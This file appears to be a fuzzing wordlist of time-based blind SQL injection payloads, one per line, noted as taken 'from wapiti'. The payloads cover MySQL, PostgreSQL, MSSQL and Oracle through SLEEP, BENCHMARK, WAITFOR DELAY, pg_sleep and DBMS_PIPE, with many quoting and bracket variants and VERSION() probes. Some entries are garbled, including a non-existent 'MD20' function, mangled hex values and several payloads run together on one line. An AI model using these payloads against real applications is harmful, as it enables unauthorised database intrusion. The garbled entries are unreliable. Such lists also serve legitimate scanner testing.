" AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND "1337" LIKE "1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND "1337"="1337
" AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
" AND 1337=BENCHMARK(20000000,MD20(0x2076e7a207)) AND "1337" LIKE "1337
" AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND "1337"="1337
" AND 1337=BENCHMARK(20000000,MD20(0x774c20341))-- 1337
" AND ELT(1337=1337,SLEEP(20)) AND "1337" LIKE "1337
" AND ELT(1337=1337,SLEEP(20)) AND "1337"="1337
" AND ELT(1337=1337,SLEEP(20))-- 1337
" AND SLEEP(20)#
" OR SLEEP(20)#
" RLIKE SLEEP(20) AND "1337" LIKE "1337
" RLIKE SLEEP(20) AND "1337"="1337
" RLIKE SLEEP(20)-- 1337
" WAITFOR DELAY '0:0:20'--
" WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
" WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
" and 0=benchmark(3000000,MD20(1))%20%23
" and 0=benchmark(3000000,MD20(1))%20--
" and 0=benchmark(3000000,MD20(1))%20/*
" or benchmark(10000000,MD20(1))#
" or pg_sleep(20)--
" or sleep(20)#
" or sleep(20)="
" waitfor delay '0:0:20' --
" waitfor delay '0:0:20' /*
") AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ("1337" LIKE "1337
") AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ("1337"="1337
") AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND ("1337" LIKE "1337
") AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND ("1337"="1337
") AND ELT(1337=1337,SLEEP(20)) AND ("1337" LIKE "1337
") AND ELT(1337=1337,SLEEP(20)) AND ("1337"="1337
") AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
") IF (1=1) WAITFOR DELAY '0:0:20'--
") RLIKE SLEEP(20) AND ("1337" LIKE "1337
") RLIKE SLEEP(20) AND ("1337"="1337
") WAITFOR DELAY '0:0:20'--
") WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
") WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
") WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
") and 0=benchmark(3000000,MD20(1))%20%23
") and 0=benchmark(3000000,MD20(1))%20--
") and 0=benchmark(3000000,MD20(1))%20/*
") or benchmark(10000000,MD20(1))#
") or pg_sleep(20)--
") or sleep(20)="
") waitfor delay '0:0:20' --
") waitfor delay '0:0:20' /*
")%20waitfor%20delay%20'0:0:20'%20--
")%20waitfor%20delay%20'0:0:20'%20/*
")) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (("1337" LIKE "1337
")) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (("1337"="1337
")) AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND (("1337" LIKE "1337
")) AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND (("1337"="1337
")) AND ELT(1337=1337,SLEEP(20)) AND (("1337" LIKE "1337
")) AND ELT(1337=1337,SLEEP(20)) AND (("1337"="1337
")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
")) RLIKE SLEEP(20) AND (("1337" LIKE "1337
")) RLIKE SLEEP(20) AND (("1337"="1337
")) WAITFOR DELAY '0:0:20'--
")) and 0=benchmark(3000000,MD20(1))%20%23
")) and 0=benchmark(3000000,MD20(1))%20--
")) and 0=benchmark(3000000,MD20(1))%20/*
")) or benchmark(10000000,MD20(1))#
")) or pg_sleep(20)--
")) or sleep(20)="
")) waitfor delay '0:0:20' --
")) waitfor delay '0:0:20' /*
"))%20waitfor%20delay%20'0:0:20'%20--
"))%20waitfor%20delay%20'0:0:20'%20/*
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ((("1337" LIKE "1337
"))) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ((("1337"="1337
"))) AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND ((("1337" LIKE "1337
"))) AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND ((("1337"="1337
"))) AND ELT(1337=1337,SLEEP(20)) AND ((("1337" LIKE "1337
"))) AND ELT(1337=1337,SLEEP(20)) AND ((("1337"="1337
"))) RLIKE SLEEP(20) AND ((("1337" LIKE "1337
"))) RLIKE SLEEP(20) AND ((("1337"="1337
"))) WAITFOR DELAY '0:0:20'--
"))) and 0=benchmark(3000000,MD20(1))%20%23
"))) and 0=benchmark(3000000,MD20(1))%20--
"))) and 0=benchmark(3000000,MD20(1))%20/*
"))) waitfor delay '0:0:20' --
"))) waitfor delay '0:0:20' /*
")))) and 0=benchmark(3000000,MD20(1))%20%23
")))) and 0=benchmark(3000000,MD20(1))%20--
")))) and 0=benchmark(3000000,MD20(1))%20/*
")))) waitfor delay '0:0:20' --
")))) waitfor delay '0:0:20' /*
"))))) waitfor delay '0:0:20' --
"))))) waitfor delay '0:0:20' /*
")))))) waitfor delay '0:0:20' --
")))))) waitfor delay '0:0:20' /*
"));waitfor delay '0:0:20'--
"),NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
");waitfor delay '0:0:20'--
",NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
";SELECT SLEEP(20); #
";SELECT pg_sleep(20);
";sleep 20
";sleep 20--
";sleep(20)
";sleep(20)--
";waitfor delay '0:0:20'--
# from wapiti
%' AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND '1337%'='1337
%' AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND '1337%'='1337
%' AND ELT(1337=1337,SLEEP(20)) AND '1337%'='1337
%' RLIKE SLEEP(20) AND '1337%'='1337
%' WAITFOR DELAY '0:0:20'--
%';SELECT PG_SLEEP(20)–
%2c(select%20*%20from%20(select(sleep(10)))a)
&&SLEEP(20)
&&SLEEP(20)#
&&SLEEP(20)--
' AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND '1337' LIKE '1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND '1337'='1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) OR '1337'='1337
' AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
' AND (SELECT 3122 FROM (SELECT(SLEEP(20)))YYYY) AND '1337'='1337
' AND (SELECT 8839 FROM (SELECT(SLEEP(10)))uzIY) AND 'mSUA'='mSUA
' AND 1337=BENCHMARK(20000000,MD20(0x2076e7a207)) AND '1337'='1337
' AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND '1337' LIKE '1337
' AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND '1337'='1337
' AND 1337=BENCHMARK(20000000,MD20(0x774c20341))-- 1337
' AND ELT(1337=1337,SLEEP(20)) AND '1337' LIKE '1337
' AND ELT(1337=1337,SLEEP(20)) AND '1337'='1337
' AND ELT(1337=1337,SLEEP(20)) OR '1337'='FMTE
' AND ELT(1337=1337,SLEEP(20))--
' AND ELT(1337=1337,SLEEP(20))-- 1337
' AND SLEEP(20)#
' AnD SLEEP(20) ANd '1
' OR ELT(1337=1337,SLEEP(20))--
' OR SLEEP(20)#
' ORDER BY SLEEP(20)
' RLIKE SLEEP(20) AND '1337' LIKE '1337
' RLIKE SLEEP(20) AND '1337'='1337
' RLIKE SLEEP(20) OR '1337'='1337
' RLIKE SLEEP(20)--
' RLIKE SLEEP(20)-- 1337
' SELECT SLEEP(20); #
' SELECT pg_sleep(20);
' WAITFOR DELAY '0:0:20'
' WAITFOR DELAY '0:0:20'--
' WAITFOR DELAY '0:0:20'–-
' WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
' WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
' and 0=benchmark(3000000,MD20(1))%20%23
' and 0=benchmark(3000000,MD20(1))%20--
' and 0=benchmark(3000000,MD20(1))%20/*
' and sleep 20
' and sleep 20 and '1'='1
' and sleep 20--
' and sleep(20)
' and sleep(20) and '1'='1
' and sleep(20)--
' or benchmark(10000000,MD20(1))#
' or pg_sleep(20)--
' or sleep(20)#
' or sleep(20)='
' waitfor delay '0:0:20' --
' waitfor delay '0:0:20' /*
'%2b(select*from(select(sleep(20)))a)%2b'
'&&SLEEP(20)&&'1
') AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ('1337'='1337
') AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ('PBiy'='PBiy
') AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
') AND (SELECT 4796 FROM (SELECT(SLEEP(20)))YYYY) AND ('1337'='1337
') AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND ('1337' LIKE '1337
') AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND ('1337'='1337
') AND 1337=BENCHMARK(20000000,MD20(0x774c20341))-- 1337
') AND =BENCHMARK(20000000,MD20(0x774c20341))--
') AND ELT(1337=1337,SLEEP(20)) AND ('1337' LIKE '1337
') AND ELT(1337=1337,SLEEP(20)) AND ('1337'='1337
') AND ELT(1337=1337,SLEEP(20))-- 1337
') AND SLEEP(20)#OR BLIND:or sleep 20--
') AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
') OR SLEEP(20)#
') RLIKE SLEEP(20) AND ('1337' LIKE '1337
') RLIKE SLEEP(20) AND ('1337'='1337
') RLIKE SLEEP(20)-- 1337
') WAITFOR DELAY '0:0:20'--
') WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
') WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
') WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
') and 0=benchmark(3000000,MD20(1))%20%23
') and 0=benchmark(3000000,MD20(1))%20--
') and 0=benchmark(3000000,MD20(1))%20/*
') or benchmark(10000000,MD20(1))#
') or pg_sleep(20)--
') or sleep(20)='
') waitfor delay '0:0:20' --
') waitfor delay '0:0:20' /*
')%20waitfor%20delay%20'0:0:20'%20--
')%20waitfor%20delay%20'0:0:20'%20/*
')) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (('1337' LIKE '1337
')) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (('1337'='1337
')) AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND (('1337' LIKE '1337
')) AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND (('1337'='1337
')) AND ELT(1337=1337,SLEEP(20)) AND (('1337' LIKE '1337
')) AND ELT(1337=1337,SLEEP(20)) AND (('1337'='1337
')) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
')) RLIKE SLEEP(20) AND (('1337' LIKE '1337
')) RLIKE SLEEP(20) AND (('1337'='1337
')) WAITFOR DELAY '0:0:20'--
')) and 0=benchmark(3000000,MD20(1))%20%23
')) and 0=benchmark(3000000,MD20(1))%20--
')) and 0=benchmark(3000000,MD20(1))%20/*
')) or benchmark(10000000,MD20(1))#
')) or pg_sleep(20)--
')) or sleep(20)='
')) waitfor delay '0:0:20' --
')) waitfor delay '0:0:20' /*
'))%20waitfor%20delay%20'0:0:20'%20--
'))%20waitfor%20delay%20'0:0:20'%20/*
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ((('1337' LIKE '1337
'))) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ((('1337'='1337
'))) AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND ((('1337' LIKE '1337
'))) AND 1337=BENCHMARK(20000000,MD20(0x774c20341)) AND ((('1337'='1337
'))) AND ELT(1337=1337,SLEEP(20)) AND ((('1337' LIKE '1337
'))) AND ELT(1337=1337,SLEEP(20)) AND ((('1337'='1337
'))) RLIKE SLEEP(20) AND ((('1337' LIKE '1337
'))) RLIKE SLEEP(20) AND ((('1337'='1337
'))) WAITFOR DELAY '0:0:20'--
'))) and 0=benchmark(3000000,MD20(1))%20%23
'))) and 0=benchmark(3000000,MD20(1))%20--
'))) and 0=benchmark(3000000,MD20(1))%20/*
'))) waitfor delay '0:0:20' --
'))) waitfor delay '0:0:20' /*
')))) and 0=benchmark(3000000,MD20(1))%20%23
')))) and 0=benchmark(3000000,MD20(1))%20--
')))) and 0=benchmark(3000000,MD20(1))%20/*
')))) waitfor delay '0:0:20' --
')))) waitfor delay '0:0:20' /*
'))))) waitfor delay '0:0:20' --
'))))) waitfor delay '0:0:20' /*
')))))) waitfor delay '0:0:20' --
')))))) waitfor delay '0:0:20' /*
'));waitfor delay '0:0:20'--
'),NULL)%20waifor%20delay%20'0:0:20'%20/*
'),NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
');waitfor delay '0:0:20'--
'+(SELECT 0x4b6b486c WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))+'
',NULL)%20waifor%20delay%20'0:0:20'%20/*
',NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
';%20waitfor%20delay%20'0:0:20'%20--%20
';WAITFOR DELAY '0:0:20'--
';WAITFOR DELAY ‘00:00:20’;--
';waitfor delay '0:0:20'--
'XOR(if(now()=sysdate(),sleep(20),0))XOR'
'XOR(if(now()=sysdate(),sleep(20*1),0))OR'
'XOR(if(now()=sysdate(),sleep(20*1),0))XOR'Z
'XOR(if(now()=sysdate(),sleep(201),0))XOR'Z1 AND (SELECT  FROM (SELECT(SLEEP(20)))YYYY) AND '%'='
'| |pg_sleep(20)–
'||(SELECT 0x4c4204f67 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))||'
'||(SELECT 0x727a20277 FROM DUAL WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))||'
(SELECT * FROM (SELECT(SLEEP(20)))ecMj)
(SELECT * FROM (SELECT(SLEEP(20)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(20)))ecMj)--
(SELECT SLEEP(20))
(SELECT pg_sleep(20))
(select(0)from(select(sleep(20)))v)
(select(0)from(select(sleep(20)))v)%2f'+(select(0)from(select(sleep(20)))v)+'"
(select(0)from(select(sleep(20)))v)/'+(select(3)from(select(sleep(20)))v)+'"+(select(0)from(select(sleep(20)))v)+"/
(select*from(select(sleep(10)))a)
(select*from(select(sleep(10)))a)#
(select*from(select(sleep(10)))a)++
(select*from(select(sleep(10)))a)--%20-
(select*from(select(sleep(20)))a)
(sleep 20)
(sleep 20)--
(sleep(20))
(sleep(20))--
) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (1337=1337
) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
) AND ELT(1337=1337,SLEEP(20)) AND (1337=1337
) AND ELT(1337=1337,SLEEP(20))-- 1337
) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
) AS 1337 WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
) RLIKE SLEEP(20) AND (1337=1337
) RLIKE SLEEP(20)-- 1337
) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
) WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
) and 0=benchmark(3000000,MD20(1))%20%23
) and 0=benchmark(3000000,MD20(1))%20--
) and 0=benchmark(3000000,MD20(1))%20/*
) waitfor delay '0:0:20' --
) waitfor delay '0:0:20' /*
)%20waitfor%20delay%20'0:0:20'%20--
)%20waitfor%20delay%20'0:0:20'%20/*
)) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND ((1337=1337
)) AND ELT(1337=1337,SLEEP(20)) AND ((1337=1337
)) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
)) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
)) AS 1337 WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
)) RLIKE SLEEP(20) AND ((1337=1337
)) and 0=benchmark(3000000,MD20(1))%20%23
)) and 0=benchmark(3000000,MD20(1))%20--
)) and 0=benchmark(3000000,MD20(1))%20/*
)) waitfor delay '0:0:20' --
)) waitfor delay '0:0:20' /*
))%20waitfor%20delay%20'0:0:20'%20--
))%20waitfor%20delay%20'0:0:20'%20/*
))) AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (((1337=1337
))) AND ELT(1337=1337,SLEEP(20)) AND (((1337=1337
))) RLIKE SLEEP(20) AND (((1337=1337
))) and 0=benchmark(3000000,MD20(1))%20%23
))) and 0=benchmark(3000000,MD20(1))%20--
))) and 0=benchmark(3000000,MD20(1))%20/*
))) waitfor delay '0:0:20' --
))) waitfor delay '0:0:20' /*
)))) and 0=benchmark(3000000,MD20(1))%20%23
)))) and 0=benchmark(3000000,MD20(1))%20--
)))) and 0=benchmark(3000000,MD20(1))%20/*
)))) waitfor delay '0:0:20' --
)))) waitfor delay '0:0:20' /*
))))) waitfor delay '0:0:20' --
)))))) waitfor delay '0:0:20' --
));waitfor delay '0:0:20'--
),NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
);waitfor delay '0:0:20'--
+ SLEEP(10) + '
+ SLEEP(20) + '
+(SELECT 0x74764164 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))+
+(SELECT 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY))+
+(SELECT 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))+
+(SELECT 1337 WHERE 1337=1337 RLIKE SLEEP(20))+
+benchmark(3200,SHA1(1))+'
, AND (SELECT 8839 FROM (SELECT(SLEEP(10)))uzIY) AND 'mSUA'='mSUA
,(select * from (select(sleep(10)))a)
,(select * from (select(sleep(20)))a)
,(select*from(select(sleep(10)))a)
,(select*from(select(sleep(10)))a)#
,(select*from(select(sleep(10)))a)++
,(select*from(select(sleep(10)))a)--
,(select*from(select(sleep(10)))a)--%20-
,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
-1+or+1%3d((SELECT+1+FROM+(SELECT+SLEEP(20))A))
-1+or+1=((SELECT+1+FROM+(SELECT+SLEEP(20))A))(SELECT * FROM (SELECT(SLEEP(20)))YYYY)(SELECT * FROM (SELECT(SLEEP(20)))YYYY)#(SELECT * FROM (SELECT(SLEEP(20)))YYYY)--'+(select*from(select(sleep(20)))a)+'(select(0)from(select(sleep(20)))v)%2f'+(select(0)from(select(sleep(20)))v)+'"(select(0)from(select(sleep(20)))v)%2f*'+(select(0)from(select(sleep(20)))v)+'"+(select(0)from(select(sleep(20)))v)+"*%2f(select(0)from(select(sleep(20)))v)/*'+(select(0)from(select(sleep(20)))v)+'"+(select(0)from(select(sleep(20)))v)+"*/',''),/*test*/%26%26%09sLeEp(20)%09--+AND BLIND:1 and sleep 20--
-BENCHMARK(100000000, rand())
-IF(MID(VERSION(),1,1) = '1', SLEEP(10), 0)
-IF(MID(VERSION(),1,1) = '2', SLEEP(10), 0)
-IF(MID(VERSION(),1,1) = '3', SLEEP(10), 0)
-IF(MID(VERSION(),1,1) = '4', SLEEP(10), 0)
-IF(MID(VERSION(),1,1) = '20', SLEEP(10), 0)
-IF(MID(VERSION(),1,1) = '20', SLEEP(20), 0)
-IF(MID(VERSION(),1,1) = '6', SLEEP(10), 0)
-IF(MID(VERSION(),1,1) = '7', SLEEP(10), 0)
-IF(MID(VERSION(),1,1) = '8', SLEEP(10), 0)
-SLEEP(120)
-sleep(20)
0'XOR(if(now()=sysdate(),sleep(20),0))XOR'Z
0'XOR(if(now()=sysdate(),sleep(20*1),0))XOR'Z
0'or(now()=sysdate()&&SLEEP(1))or'Zif(now()=sysdate(),sleep(20),0)/"XOR(if(now()=sysdate(),sleep(20),0))OR"/if(now()=sysdate(),sleep(20),0)/*'XOR(if(now()=sysdate(),sleep(20),0))OR'"XOR(if(now()=sysdate(),sleep(20),0))OR"*/if(now()=sysdate(),sleep(20),0)/'XOR(if(now()=sysdate(),sleep(20),0))OR'"XOR(if(now()=sysdate(),sleep(20),0) and 20=20)"/SLEEP(20)/*' or SLEEP(20) or '" or SLEEP(20) or "*/%2c(select%20*%20from%20(select(sleep(20)))a)
0'|(IF((now())LIKE(sysdate()),SLEEP(1),0))|'Z
1 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND (1337=1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)# 1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
1 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-1337
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(20))
1 AND 1337=(SELECT 1337 FROM PG_SLEEP(20))-- 1337
1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20)1 AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20)-- 1337' AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20) AND '1337'='1337') AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20) AND ('1337'='1337) AND 1337=DBMS_PIPE.RECEIVE_MESSAGE(CHR(118)||CHR(71)||CHR(73)||CHR(86),20) AND (1337=1337
1 AND ELT(1337=1337,SLEEP(20))
1 AND ELT(1337=1337,SLEEP(20))# 1337
1 AND ELT(1337=1337,SLEEP(20))-- 1337
1 AnD SLEEP(20)
1 RLIKE SLEEP(20)
1 RLIKE SLEEP(20)# 1337
